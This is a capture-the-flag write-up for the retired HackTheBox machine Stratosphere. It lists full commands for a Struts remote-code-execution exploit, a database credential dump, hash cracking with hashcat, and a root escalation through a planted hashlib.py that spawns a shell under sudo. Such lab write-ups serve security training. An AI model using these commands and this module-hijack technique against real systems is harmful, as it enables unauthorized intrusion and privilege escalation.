Hackthebox – Stratosphere Writeup


This is a writeup for the Stratosphere machine on hackthebox.eu which was retired on 9/1/18!

First, enumerate! Let’s try the custom python enumeration script a friend of ours made:
https://github.com/vishalb2308/Pentest-Enumeration-Script/blob/master/EnumScript.py

This means we run the following 3 commands..
mkdir /root/Desktop/MyScripts
mkdir /root/Desktop/MyScripts/Reports
python3 EnumScript.py

Script suggests port 22, 80, and 8080 are open.
Note:SSH supports password and publickey
Script also used nikto to find host-manager, index, and manager as pages, but we need more, it doesn’t seem what we have is giving us anything.

Let’s try gobuster instead:
sudo apt-get update
sudo apt-get install gobuster
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.64 -x php,html,txt,jsp -t 100

We got additional /Monitoring after gobuster ran for a while.

on the monitoring page, looking at the scripts suggests a lot of .action extensions. We google this and find that it’s an extension associated with struts. Therefore, let’s try the following vulnerability:
https://github.com/mazen160/struts-pwn
we run:
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'ls'

there is a file called db_connect so we run:
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'cat db_connect'
this is returned to us:
[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

Seems it’s a mysql database so we run:
python exploit.py –url ‘10.10.10.64/Monitoring/example/Login.action’ -c ‘mysql -uadmin -padmin -e”show databases”‘
this returns the following 3 databases:
Database
informtion_schema
users

Now we run:
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'mysql -uadmin -padmin -e"show tables from users"'
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'mysql -uadmin -padmin -e"use users; select * from accounts"'

this gave us the following info with fullname, password, and username!
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
ssh richard@10.10.10.64

Let’s try to SSH in with this:
ssh richard@10.10.10.64

got user!!

Next onto root..

We see a test.py.. let’s do it.. using hashcat i guess.

put the first one in a file called hash1, used the following command:
hashcat -m 0 hash1 ../rockyou.txt --force
cracked with it being kaybboo!

next one is SHA1 so that -m 100:
hashcat -m 100 hash2 ../rockyou.txt --force
cracked it with it being: ninjaabisshinobi

Next one is MD4 so -m 900
hashcat -m 900 hash3 ../rockyou.txt --force
cracked with it being legend72

Last one is blake2b which is -m 600
hashcat -m 600 hash 4 ../rockyou.txt --force
note: make sure you put a $BLAKE2$ before the hash for this one..
cracked with: Fhero6610

well that was a rabiit hole… permission denied.. great.

ok so let’s study the python file since we can run it as sudo.

it imports hashlib, so let’s just put a file caleld hashlib.py in /home/richard with the following commands in it:
import os
os.system('/bin/bash')

now let’s run it!
sudo /usr/bin/python3.5 /home/richard/test.py

viola, we have root.

Leave a Reply

Your email address will not be published. Required fields are marked *